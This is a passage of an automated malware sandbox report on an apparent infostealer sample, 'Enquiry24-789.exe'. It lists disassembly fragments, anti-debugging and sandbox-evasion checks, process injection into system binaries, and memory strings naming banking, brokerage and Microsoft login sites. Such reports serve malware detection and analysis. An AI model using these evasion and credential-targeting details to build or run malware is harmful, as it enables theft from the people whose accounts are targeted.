Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0040DA28 push A93656ADh; ret 2_2_0040DA39
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00403B28 push eax; ret 2_2_00403B2A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041938D push es; retf 2_2_004193A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00418456 push ss; iretd 2_2_00418457
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004195C4 push edi; retf 2_2_004195C5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_004165AB push esi; iretd 2_2_004165B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00408DBC push 4D2078E9h; iretd 2_2_00408DCE
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00419676 push ecx; ret 2_2_00419677
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041EEFB push esp; iretd 2_2_0041EF11
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00423E87 push esi; retf 2_2_00423E8B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00423EB3 push eax; ret 2_2_00423EB4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041EF28 push esp; ret 2_2_0041EF29
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0041AF32 push ebp; retf 2_2_0041AF6E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054027FA pushad ; ret 2_2_054027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0540225F pushad ; ret 2_2_054027F9
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054309AD push ecx; mov dword ptr [esp], ecx 2_2_054309B6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0540283D push eax; iretd 2_2_05402858
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05401365 push eax; iretd 2_2_05401369
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046427FA pushad ; ret 5_2_046427F9
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0464225F pushad ; ret 5_2_046427F9
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0464283D push eax; iretd 5_2_04642858
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_046709AD push ecx; mov dword ptr [esp], ecx 5_2_046709B6
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0256035C push esi; retf 5_2_02560360
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_02552342 push esp; retf 5_2_02552343
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_02560388 push eax; ret 5_2_02560389
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_025627D4 push es; ret 5_2_025627D5
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BEF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 0_2_00BEF98E
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C61C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, 0_2_00C61C41
Source: C:\Users\user\Desktop\Enquiry24-789.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\sdchange.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\Enquiry24-789.exe Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Users\user\Desktop\Enquiry24-789.exe API/Special instruction interceptor: Address: 2383254
Source: C:\Windows\SysWOW64\sdchange.exe API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\sdchange.exe API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\sdchange.exe API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\sdchange.exe API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\sdchange.exe API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\sdchange.exe API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\sdchange.exe API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\sdchange.exe API/Special instruction interceptor: Address: 7FF8C88EDA44
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0547096E rdtsc 2_2_0547096E
Source: C:\Users\user\Desktop\Enquiry24-789.exe API coverage: 3.8 %
Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
Source: C:\Windows\SysWOW64\sdchange.exe API coverage: 2.5 %
Source: C:\Windows\SysWOW64\sdchange.exe TID: 5556 Thread sleep count: 58 > 30
Source: C:\Windows\SysWOW64\sdchange.exe TID: 5556 Thread sleep time: -116000s >= -30000s
Source: C:\Program Files (x86)\CYRpHqtKcMQCSJzDEIIedYOIOhStxvmsHzhuxwcMUmJScJoWPdBmBKpJheZWMmQUQDvczDNiuCVyItxy\FNvzpsCDjtsg.exe TID: 4480 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\sdchange.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C3DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose, 0_2_00C3DBBE
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C0C2A2 FindFirstFileExW, 0_2_00C0C2A2
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C468EE FindFirstFileW,FindClose, 0_2_00C468EE
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C4698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime, 0_2_00C4698F
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C3D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00C3D076
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C3D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00C3D3A9
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C49642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C49642
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C4979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_00C4979D
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C49B2B FindFirstFileW,Sleep,FindNextFileW,FindClose, 0_2_00C49B2B
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C45C97 FindFirstFileW,FindNextFileW,FindClose, 0_2_00C45C97
Source: C:\Windows\SysWOW64\sdchange.exe Code function: 5_2_0255C3F0 FindFirstFileW,FindNextFileW,FindClose, 5_2_0255C3F0
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BD42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00BD42DE
Source: sdchange.exe, 00000005.00000002.3276351292.0000000007A84000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware
Source: -NG6N06.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: -NG6N06.5.dr Binary or memory string: discord.comVMware20,11696428655f
Source: -NG6N06.5.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: -NG6N06.5.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: -NG6N06.5.dr Binary or memory string: global block list test formVMware20,11696428655
Source: -NG6N06.5.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: -NG6N06.5.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: sdchange.exe, 00000005.00000002.3276351292.0000000007A84000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: address_1VARCHARVMware
Source: -NG6N06.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: -NG6N06.5.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: -NG6N06.5.dr Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
Source: -NG6N06.5.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: -NG6N06.5.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: -NG6N06.5.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: -NG6N06.5.dr Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: -NG6N06.5.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: sdchange.exe, 00000005.00000002.3272888173.00000000029C6000.00000004.00000020.00020000.00000000.sdmp, FNvzpsCDjtsg.exe, 00000008.00000002.3274059679.0000000001399000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2956756147.000001BBD170C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: -NG6N06.5.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: -NG6N06.5.dr Binary or memory string: outlook.office.comVMware20,11696428655s
Source: -NG6N06.5.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: -NG6N06.5.dr Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: -NG6N06.5.dr Binary or memory string: AMC password management pageVMware20,11696428655
Source: -NG6N06.5.dr Binary or memory string: tasks.office.comVMware20,11696428655o
Source: -NG6N06.5.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: -NG6N06.5.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: -NG6N06.5.dr Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: -NG6N06.5.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: -NG6N06.5.dr Binary or memory string: dev.azure.comVMware20,11696428655j
Source: -NG6N06.5.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: -NG6N06.5.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: -NG6N06.5.dr Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: -NG6N06.5.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: -NG6N06.5.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\sdchange.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0547096E rdtsc 2_2_0547096E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_00417E2B LdrLoadDll, 2_2_00417E2B
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C4EAA2 BlockInput, 0_2_00C4EAA2
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00C02622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00C02622
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BD42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_00BD42DE
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_00BF4CE8 mov eax, dword ptr fs:[00000030h] 0_2_00BF4CE8
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_023834C0 mov eax, dword ptr fs:[00000030h] 0_2_023834C0
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_02383520 mov eax, dword ptr fs:[00000030h] 0_2_02383520
Source: C:\Users\user\Desktop\Enquiry24-789.exe Code function: 0_2_02381E70 mov eax, dword ptr fs:[00000030h] 0_2_02381E70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05438550 mov eax, dword ptr fs:[00000030h] 2_2_05438550
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546656A mov eax, dword ptr fs:[00000030h] 2_2_0546656A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C6500 mov eax, dword ptr fs:[00000030h] 2_2_054C6500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05504500 mov eax, dword ptr fs:[00000030h] 2_2_05504500
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440535 mov eax, dword ptr fs:[00000030h] 2_2_05440535
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545E53E mov eax, dword ptr fs:[00000030h] 2_2_0545E53E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546E5CF mov eax, dword ptr fs:[00000030h] 2_2_0546E5CF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054365D0 mov eax, dword ptr fs:[00000030h] 2_2_054365D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546A5D0 mov eax, dword ptr fs:[00000030h] 2_2_0546A5D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545E5E7 mov eax, dword ptr fs:[00000030h] 2_2_0545E5E7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054325E0 mov eax, dword ptr fs:[00000030h] 2_2_054325E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546C5ED mov eax, dword ptr fs:[00000030h] 2_2_0546C5ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05432582 mov eax, dword ptr fs:[00000030h] 2_2_05432582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05432582 mov ecx, dword ptr fs:[00000030h] 2_2_05432582
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05464588 mov eax, dword ptr fs:[00000030h] 2_2_05464588
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546E59C mov eax, dword ptr fs:[00000030h] 2_2_0546E59C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B05A7 mov eax, dword ptr fs:[00000030h] 2_2_054B05A7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054545B1 mov eax, dword ptr fs:[00000030h] 2_2_054545B1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546E443 mov eax, dword ptr fs:[00000030h] 2_2_0546E443
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054EA456 mov eax, dword ptr fs:[00000030h] 2_2_054EA456
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542645D mov eax, dword ptr fs:[00000030h] 2_2_0542645D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545245A mov eax, dword ptr fs:[00000030h] 2_2_0545245A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054BC460 mov ecx, dword ptr fs:[00000030h] 2_2_054BC460
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545A470 mov eax, dword ptr fs:[00000030h] 2_2_0545A470
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05468402 mov eax, dword ptr fs:[00000030h] 2_2_05468402
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542E420 mov eax, dword ptr fs:[00000030h] 2_2_0542E420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542C427 mov eax, dword ptr fs:[00000030h] 2_2_0542C427
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B6420 mov eax, dword ptr fs:[00000030h] 2_2_054B6420
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546A430 mov eax, dword ptr fs:[00000030h] 2_2_0546A430
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054304E5 mov ecx, dword ptr fs:[00000030h] 2_2_054304E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054EA49A mov eax, dword ptr fs:[00000030h] 2_2_054EA49A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054364AB mov eax, dword ptr fs:[00000030h] 2_2_054364AB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054644B0 mov ecx, dword ptr fs:[00000030h] 2_2_054644B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054BA4B0 mov eax, dword ptr fs:[00000030h] 2_2_054BA4B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546674D mov esi, dword ptr fs:[00000030h] 2_2_0546674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546674D mov eax, dword ptr fs:[00000030h] 2_2_0546674D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05430750 mov eax, dword ptr fs:[00000030h] 2_2_05430750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054BE75D mov eax, dword ptr fs:[00000030h] 2_2_054BE75D
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472750 mov eax, dword ptr fs:[00000030h] 2_2_05472750
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B4755 mov eax, dword ptr fs:[00000030h] 2_2_054B4755
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05438770 mov eax, dword ptr fs:[00000030h] 2_2_05438770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05440770 mov eax, dword ptr fs:[00000030h] 2_2_05440770
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546C700 mov eax, dword ptr fs:[00000030h] 2_2_0546C700
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05430710 mov eax, dword ptr fs:[00000030h] 2_2_05430710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05460710 mov eax, dword ptr fs:[00000030h] 2_2_05460710
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546C720 mov eax, dword ptr fs:[00000030h] 2_2_0546C720
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546273C mov eax, dword ptr fs:[00000030h] 2_2_0546273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546273C mov ecx, dword ptr fs:[00000030h] 2_2_0546273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546273C mov eax, dword ptr fs:[00000030h] 2_2_0546273C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054AC730 mov eax, dword ptr fs:[00000030h] 2_2_054AC730
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543C7C0 mov eax, dword ptr fs:[00000030h] 2_2_0543C7C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B07C3 mov eax, dword ptr fs:[00000030h] 2_2_054B07C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054527ED mov eax, dword ptr fs:[00000030h] 2_2_054527ED
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054BE7E1 mov eax, dword ptr fs:[00000030h] 2_2_054BE7E1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054347FB mov eax, dword ptr fs:[00000030h] 2_2_054347FB
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D678E mov eax, dword ptr fs:[00000030h] 2_2_054D678E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054307AF mov eax, dword ptr fs:[00000030h] 2_2_054307AF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054E47A0 mov eax, dword ptr fs:[00000030h] 2_2_054E47A0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544C640 mov eax, dword ptr fs:[00000030h] 2_2_0544C640
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F866E mov eax, dword ptr fs:[00000030h] 2_2_054F866E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546A660 mov eax, dword ptr fs:[00000030h] 2_2_0546A660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05462674 mov eax, dword ptr fs:[00000030h] 2_2_05462674
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054AE609 mov eax, dword ptr fs:[00000030h] 2_2_054AE609
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544260B mov eax, dword ptr fs:[00000030h] 2_2_0544260B
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05472619 mov eax, dword ptr fs:[00000030h] 2_2_05472619
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0544E627 mov eax, dword ptr fs:[00000030h] 2_2_0544E627
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05466620 mov eax, dword ptr fs:[00000030h] 2_2_05466620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05468620 mov eax, dword ptr fs:[00000030h] 2_2_05468620
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0543262C mov eax, dword ptr fs:[00000030h] 2_2_0543262C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546A6C7 mov ebx, dword ptr fs:[00000030h] 2_2_0546A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546A6C7 mov eax, dword ptr fs:[00000030h] 2_2_0546A6C7
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054AE6F2 mov eax, dword ptr fs:[00000030h] 2_2_054AE6F2
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B06F1 mov eax, dword ptr fs:[00000030h] 2_2_054B06F1
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05434690 mov eax, dword ptr fs:[00000030h] 2_2_05434690
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0546C6A6 mov eax, dword ptr fs:[00000030h] 2_2_0546C6A6
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054666B0 mov eax, dword ptr fs:[00000030h] 2_2_054666B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C4144 mov eax, dword ptr fs:[00000030h] 2_2_054C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C4144 mov ecx, dword ptr fs:[00000030h] 2_2_054C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C4144 mov eax, dword ptr fs:[00000030h] 2_2_054C4144
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542C156 mov eax, dword ptr fs:[00000030h] 2_2_0542C156
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054C8158 mov eax, dword ptr fs:[00000030h] 2_2_054C8158
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05436154 mov eax, dword ptr fs:[00000030h] 2_2_05436154
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05504164 mov eax, dword ptr fs:[00000030h] 2_2_05504164
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DE10E mov eax, dword ptr fs:[00000030h] 2_2_054DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DE10E mov ecx, dword ptr fs:[00000030h] 2_2_054DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DE10E mov eax, dword ptr fs:[00000030h] 2_2_054DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DE10E mov ecx, dword ptr fs:[00000030h] 2_2_054DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DE10E mov eax, dword ptr fs:[00000030h] 2_2_054DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DE10E mov ecx, dword ptr fs:[00000030h] 2_2_054DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DE10E mov eax, dword ptr fs:[00000030h] 2_2_054DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DE10E mov ecx, dword ptr fs:[00000030h] 2_2_054DE10E
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DA118 mov ecx, dword ptr fs:[00000030h] 2_2_054DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054DA118 mov eax, dword ptr fs:[00000030h] 2_2_054DA118
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F0115 mov eax, dword ptr fs:[00000030h] 2_2_054F0115
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05460124 mov eax, dword ptr fs:[00000030h] 2_2_05460124
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F61C3 mov eax, dword ptr fs:[00000030h] 2_2_054F61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054F61C3 mov eax, dword ptr fs:[00000030h] 2_2_054F61C3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_054AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_054AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054AE1D0 mov ecx, dword ptr fs:[00000030h] 2_2_054AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_054AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054AE1D0 mov eax, dword ptr fs:[00000030h] 2_2_054AE1D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_055061E5 mov eax, dword ptr fs:[00000030h] 2_2_055061E5
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054601F8 mov eax, dword ptr fs:[00000030h] 2_2_054601F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05470185 mov eax, dword ptr fs:[00000030h] 2_2_05470185
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054EC188 mov eax, dword ptr fs:[00000030h] 2_2_054EC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054EC188 mov eax, dword ptr fs:[00000030h] 2_2_054EC188
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D4180 mov eax, dword ptr fs:[00000030h] 2_2_054D4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D4180 mov eax, dword ptr fs:[00000030h] 2_2_054D4180
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B019F mov eax, dword ptr fs:[00000030h] 2_2_054B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B019F mov eax, dword ptr fs:[00000030h] 2_2_054B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B019F mov eax, dword ptr fs:[00000030h] 2_2_054B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B019F mov eax, dword ptr fs:[00000030h] 2_2_054B019F
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542A197 mov eax, dword ptr fs:[00000030h] 2_2_0542A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542A197 mov eax, dword ptr fs:[00000030h] 2_2_0542A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0542A197 mov eax, dword ptr fs:[00000030h] 2_2_0542A197
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_05432050 mov eax, dword ptr fs:[00000030h] 2_2_05432050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B6050 mov eax, dword ptr fs:[00000030h] 2_2_054B6050
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_0545C073 mov eax, dword ptr fs:[00000030h] 2_2_0545C073
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054B4000 mov ecx, dword ptr fs:[00000030h] 2_2_054B4000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D2000 mov eax, dword ptr fs:[00000030h] 2_2_054D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D2000 mov eax, dword ptr fs:[00000030h] 2_2_054D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D2000 mov eax, dword ptr fs:[00000030h] 2_2_054D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D2000 mov eax, dword ptr fs:[00000030h] 2_2_054D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D2000 mov eax, dword ptr fs:[00000030h] 2_2_054D2000
Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_054D2000 mov eax, dword ptr fs:[00000030h] 2_2_054D2000
